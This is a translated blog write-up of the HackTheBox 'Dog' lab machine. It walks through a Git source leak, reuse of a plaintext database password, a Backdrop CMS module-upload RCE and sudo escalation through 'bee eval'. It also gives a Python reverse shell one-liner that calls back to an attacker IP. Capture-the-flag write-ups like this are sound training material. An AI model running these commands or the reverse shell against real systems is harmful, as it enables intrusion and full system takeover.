Virts

Virts

Virts's Blog ❤️
telegram
github
email
steam
douban
HomeArchives

HackTheBox [Dog] WriteUp

27
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The task involves exploiting a machine on HackTheBox named "Dog". The process begins by scanning for open ports, identifying ports 22 and 80. Port 22 does not allow password logins. Accessing the HTTP service reveals the site uses BackDrop CMS. A directory scan uncovers a Git leak, allowing the source code to be downloaded using GitHack. Within the source code, a plaintext password is found in the `settings.php` file, which is used to attempt a password spray against the website's users. The only user found is "dogBackDropSystem", but the password does not work. Further investigation reveals another username, "tiffany", through email addresses in the code. Using the password, access to the admin backend is gained. An RCE vulnerability is discovered, and a shell is uploaded via a manual installation process. A reverse shell is established, providing access as the user "www-data". The `/etc/passwd` file shows two additional users, "jobert" and "johncusack". The password is reused to log into "johncusack" and retrieve the user flag. Privilege escalation is attempted by checking the commands that "johncusack" can run with `sudo`. A command called "bee" allows execution of arbitrary PHP code. However, a direct attempt to execute a shell fails due to bootstrap requirements. Following guidance from an article, the command is executed with the `--root` parameter, successfully gaining root access and retrieving the root flag.

image

GetShell#

Scanning the ports revealed that only ports 22 and 80 were open, and password login was not allowed on port 22.

Accessing HTTP, the website fingerprint was identified as BackDrop CMS. Scanning directories revealed a Git leak, and the source code was downloaded using GitHack.

python GitHack.py http://10.10.11.58/.git

Looking at the git commit history did not reveal much, but there was a plaintext password in the settings.php file.

$database = 'mysql://root:[email protected]/backdrop';

This password could be used to attempt a password spray against the website users. Only one user dogBackDropSystem was found, but the password was incorrect.

Continuing to gather information from the source code, the username might also appear in the email, so a grep search was performed.

grep -i "dog.htb" -R .
./files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json:        "[email protected]"
./.git/logs/HEAD:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]b> 1738963331 +0000  commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases
./.git/logs/refs/heads/master:0000000000000000000000000000000000000000 8204779c764abd4c9d8d95038b6d22b6a7515afa root <[email protected]b> 1738963331 +0000     commit (initial): todo: customize url aliases. reference:https://docs.backdropcms.org/documentation/url-aliases

Another username tiffany was found, and combining it with the previously found password BackDropJ2024DS2024 successfully logged into the admin backend, leaving the task of getting a shell.

An RCE vulnerability was found in Exploit-DB, and the zip package generated by the POC was uploaded to http://10.10.11.58/?q=admin/modules/install, but zip format was not supported. The shell folder generated by the POC was compressed using tar, then manually uploaded to http://10.10.11.58/?q=admin/installer/manual.

The upload was successful, and accessing http://10.10.11.58/modules/shell/shell.php confirmed successful RCE, but it seemed to be cleared after a minute or two.

A local nc listener was set up on a port.

nc -lv 9443

Then, a Python reverse shell was used in the uploaded shell.php.

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.45',9443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

The reverse shell was successful, and the shell user obtained was www-data. Checking /etc/passwd revealed two users jobert and johncusack. Using the previous password BackDropJ2024DS2024, access to the johncusack account was successfully gained, obtaining the user flag.

cat /home/johncusack/user.txt

Privilege Escalation#

Using sudo -l to check the privileged commands that the johncusack user can execute.

johncusack@dog:~$ sudo -l
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

A bee command was found, and checking help revealed that it could directly execute PHP code using the bee eval command.

johncusack@dog:~$ bee help eval
eval, ev, php-eval
Evaluate (run/execute) arbitrary PHP code after bootstrapping Backdrop.

Arguments:
 code
 The PHP code to evaluate.

Examples:
 bee eval '$node = node_load(1); print $node->title;'
 Loads node with nid 1 and then prints its title.

 bee eval "node_access_rebuild();"
 Rebuild node access permissions.

 bee eval "file_unmanaged_copy('$HOME/Pictures/image.jpg', 'public://image.jpg');"
 Copies a file whose path is determined by an environment's variable. Note the use of double quotes so the variable $HOME gets replaced by its value.

However, directly using the eval parameter did not work.

johncusack@dog:~$ sudo bee eval "system('/bin/bash');"
sudo bee eval "system('/bin/bash');"

tput: unknown terminal "unknown"
tput: unknown terminal "unknown"
  The required bootstrap level for 'eval' is not ready.

Referring to this article, it was found that the --root parameter needed to specify the website root directory.

sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash');"

Successfully obtained a root shell.

cat /root/root.txt

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.